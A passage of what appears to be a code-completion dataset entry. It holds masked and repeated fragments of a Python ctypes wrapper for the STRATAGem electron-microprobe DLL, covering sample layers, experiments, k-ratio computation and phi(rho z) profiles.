iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n <mask token>\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n <mask token>\n <mask token>\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n <mask token>\n <mask token>\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n <mask token>\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n <mask token>\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n <mask token>\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n <mask token>\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n<mask token>\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n<mask token>\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n 